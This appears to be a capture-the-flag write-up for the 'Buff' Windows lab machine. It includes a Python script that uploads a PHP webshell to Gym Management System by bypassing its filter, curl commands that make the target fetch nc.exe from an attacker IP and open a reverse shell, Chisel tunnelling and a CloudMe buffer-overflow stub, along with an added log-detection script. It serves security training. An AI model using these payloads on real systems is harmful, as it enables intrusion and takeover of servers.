Buff
16th Oct 2020 / Document No D20.100.95
Difficulty: Easy
Classification: Official
Synopsis
Buff is an easy difficulty Windows machine that features an instance of Gym Management System
1.0. This is found to suffer from an unauthenticated remote code execution vulnerability.
Enumeration of the internal network reveals a service running at port 8888. The installation file
for this service can be found on disk, allowing us to debug it locally. We can perform port
forwarding in order to make the service available and exploit it.
Skills Required
Basic Networking
Enumeration
Skills Learned
Unauthenticated RCE
Buffer Overflow
Port Forwarding
Enumeration
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.198 | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p $ports 10.10.10.198 -Pn
The Nmap scan reveals port 8080, which is running an Apache server with PHP version 7.4.6.
Visiting /contact reveals the version of the web application.
Foothold
We know that the web application is running Gym Management Software 1.0. Searching for
known issues for this application reveals an unauthenticated file upload vulnerability, which
allows attackers to gain RCE.
We can download Gym Management Software from here. Let's take a look at the source code to
understand how it works.
unzip Gym-Management-System-Project-in-PHP-master.zip
According to public analysis of this application, the vulnerability exists in upload.php because the
application doesn't check whether the user is authenticated.
<?php
<SNIP>
$user = $_GET['id'];
$allowedExts = array("jpg", "jpeg", "gif", "png","JPG");
$extension = @end(explode(".", $_FILES["file"]["name"]));
if(isset($_POST['pupload'])){
if ((($_FILES["file"]["type"] == "image/png")
<SNIP>
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/". $user.".".$ext);
$url=$user.".".$ext;
<SNIP>
?>
Looking at the source code of upload.php, we see that it takes the GET parameter id and
assigns its value to the variable user. It also checks whether the uploaded image is valid, but we can bypass
those filters by adding a double extension. Let's create a simple Python script to upload our
malicious PHP code.
#!/usr/bin/env python3
import requests


def Main():
    url = "http://10.10.10.198:8080/upload.php?id=test"
    s = requests.Session()
    s.get(url, verify=False)
    # PNG signature, sent as bytes so requests does not UTF-8 encode 0x89
    PNG_magicBytes = b'\x89\x50\x4e\x47\x0d\x0a\x1a'
    png = {
        'file': (
            'test.php.png',  # double extension: last part passes the filter
            PNG_magicBytes + b'\n' + b'<?php echo shell_exec($_GET["cmd"]); ?>',
            'image/png',     # MIME type the application compares against
            {'Content-Disposition': 'form-data'}
        )
    }
    data = {'pupload': 'upload'}
    r = s.post(url=url, files=png, data=data, verify=False)
    print("Uploaded!")


if __name__ == "__main__":
    Main()
We satisfy the check that this is a valid PNG file by prepending the PNG magic bytes, which
begin with 0x8950 in hex.
The PHP code in our webshell executes any command we supply in a GET request through
the "cmd" parameter.
This succeeded. Let's upgrade to a proper shell. First, upload a Netcat binary, then stand up a
simple Python HTTP server and a Netcat listener locally on port 4444.
python3 -m http.server 80
nc -lvnp 4444
Finally, issue the commands below to download nc.exe and execute it to spawn a reverse shell.
curl "http://10.10.10.198:8080/upload/test.php?cmd=powershell%20Invoke-WebRequest%20-Uri%20http%3A%2F%2F10.10.14.2%2Fnc.exe%20-Outfile%20c%3A%5Cusers%5Cpublic%5Cnc.exe"
curl "http://10.10.10.198:8080/upload/test.php?cmd=c%3A%5Cusers%5Cpublic%5Cnc.exe%2010.10.14.2%204444%20-e%20cmd.exe"
We've successfully received a more stable reverse shell.
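From the defender's side, the upload and webshell traffic in this section leaves a clear trail in the web server's access log. The following is an added example, not part of the original write-up: it runs a small detection over constructed Apache-style log lines, flags any request for a non-image file under /upload/, and links each hit back to an earlier POST to upload.php that carried the same id. The log format, field layout and sample lines are assumptions made for the example.

```python
#!/usr/bin/env python3
"""Spot webshell activity in the upload directory from web access logs.
Added example; the sample lines below are constructed, not real logs."""
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

SAMPLE_LOG = """\
10.10.14.2 - - [16/Oct/2020:10:01:02 +0000] "POST /upload.php?id=test HTTP/1.1" 200 512 "-" "python-requests/2.24.0"
10.10.14.2 - - [16/Oct/2020:10:01:05 +0000] "GET /upload/test.php?cmd=whoami HTTP/1.1" 200 45 "-" "curl/7.72.0"
10.10.14.2 - - [16/Oct/2020:10:02:10 +0000] "GET /upload/test.php?cmd=c%3A%5Cusers%5Cpublic%5Cnc.exe%2010.10.14.2%204444%20-e%20cmd.exe HTTP/1.1" 200 0 "-" "curl/7.72.0"
192.168.1.5 - - [16/Oct/2020:10:03:00 +0000] "GET /upload/avatar.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.5 - - [16/Oct/2020:10:03:01 +0000] "GET /contact.php HTTP/1.1" 200 1300 "-" "Mozilla/5.0"
"""

# Apache combined-log prefix: ip ident user [ts] "METHOD target PROTO" status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
IMAGE_EXTS = {"jpg", "jpeg", "gif", "png"}
UPLOAD_DIR = "/upload/"


def analyse(log_text: str):
    """Return one finding per request that fetches a non-image file from the
    upload directory.  Each finding carries the decoded query string and, when
    the file stem matches an id seen in an earlier POST to upload.php, that id."""
    findings = []
    uploaded_ids = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        url = urlsplit(m["target"])
        path, query = url.path, url.query
        # Remember which ids were used to upload, so later hits can be correlated.
        if m["method"] == "POST" and path == "/upload.php":
            uploaded_ids.update(parse_qs(query).get("id", []))
            continue
        if not path.startswith(UPLOAD_DIR):
            continue
        name = os.path.basename(path)
        stem, _, ext = name.rpartition(".")
        if ext.lower() in IMAGE_EXTS:
            continue  # an image being served is the expected use of the directory
        findings.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "path": path,
            "query": unquote(query),
            "status": int(m["status"]),
            "linked_upload_id": stem if stem in uploaded_ids else None,
            "reason": "non-image file requested from upload directory",
        })
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} id={f['linked_upload_id']} {f['query']}")
```

The rule is deliberately simple: a legitimate deployment never serves scripts from its upload directory, so any such request is worth an alert on its own, and the decoded query string gives the responder the executed command without further lookup.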
Lateral Movement
On enumerating the file system, we come across the binary CloudMe_1112.exe in the directory
C:\Users\shaun\Downloads.
After downloading and running the installer in a VM, we see that the service is listening on port
8888. Using netstat, we confirm that port 8888 is available on the box, bound to localhost.
Privilege Escalation
Searching online for "Cloud Me" version 1112 returns this Exploit-DB exploit. Inspection reveals
that it's a buffer overflow exploit (see Appendix A for the code listing).
As the service listens on localhost, we can make this port available to our machine using a SOCKS
proxy. To accomplish this, we can use Chisel. First, set up the Chisel server on our attacking
machine, listening on port 9999.
We can download Chisel for Windows and upload it to the target machine so we can tunnel port
8080 to our system.
We confirm that the tunnel was successfully established. Let's use msfvenom to generate
shellcode.
python2 run.py
This is successful: we receive a shell as Administrator and can read the root flag on the
desktop.
Appendix A
CloudMe Exploit Code:
import socket
import sys

target = "127.0.0.1"

# buf holds the overflow payload; it is omitted from this listing and must be
# defined before the code below is run.

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
except Exception as e:
    # sys.exc_value only exists in Python 2; printing the exception works in both
    print(e)